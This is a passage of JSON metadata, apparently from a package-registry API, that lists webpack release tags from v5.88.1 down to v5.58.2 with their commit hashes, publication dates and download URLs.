ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwe